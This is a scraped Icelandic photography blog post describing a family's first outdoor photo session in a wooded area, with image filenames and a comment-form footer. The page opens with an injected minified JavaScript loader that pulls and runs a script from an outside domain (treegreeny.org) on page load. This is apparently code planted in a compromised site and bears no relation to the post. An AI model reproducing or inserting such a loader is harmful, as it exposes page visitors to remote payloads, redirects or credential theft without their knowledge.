;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Höfðu aldrei farið í fjölskyldumyndatöku – Eydís — Ljósmyndun

Höfðu aldrei farið í fjölskyldumyndatöku

Þessi fallega fjölskylda hafði aldrei farið til ljósmyndara áður. Lífið getur verið fullt af óvæntum uppákomum og nóg af þeim þegar börnin eru þrjú. Þetta var hlýr sumardagur og við ákváðum að finna skógarsvæði fyrir myndatökuna. Það er nóg af fallegum grænum svæðum á höfuðborgarsvæðinu. Við fundum lítið skógarrjóður og börnin fóru strax að kanna svæðið, klifra í nokkrum trjám og safna könglum. Feimnin rjátlaði fljótt af þeim og innan skamms voru þau allt of upptekin af því að skoða umhverfið og segja mér hvað þau væru að finna en að taka eftir því að ég væri að mynda þau.mariavidvatnid

 Þetta er það góða við útimyndatökur. Hvort sem börnin eru feimin að eðlisfari eða fjörkálfar. Þá fá þau útrás í náttúrunni og ég kynnist þeim á jafningjagrundvelli.

mariaogfjolsk

Þetta er það góða við útimyndatökur. Hvort sem börnin eru feimin að eðlisfari eða fjörkálfar. Þá fá þau útrás í náttúrunni og ég kynnist þeim á jafningjagrundvelli.mariaogfjolskylda3

Leave a Reply

Your email address will not be published. Required fields are marked *